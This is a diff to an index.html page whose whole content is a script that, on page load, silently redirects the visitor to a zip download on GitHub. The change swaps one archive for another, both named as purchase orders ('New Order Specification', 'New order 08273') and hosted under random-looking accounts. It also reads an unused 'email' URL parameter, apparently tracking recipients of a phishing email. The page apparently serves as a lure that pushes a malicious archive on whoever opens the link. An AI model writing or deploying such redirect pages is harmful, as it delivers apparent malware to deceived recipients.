--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
-window.location.href = `https://github.com/pfdjssk/hg/raw/refs/heads/main/Symphony%20Building%20-%20New%20Order%20Specification.zip`;</script>
+window.location.href = `https://github.com/gdfgfdfdaa/fd/raw/refs/heads/main/New%20order%2008273.zip`;</script>
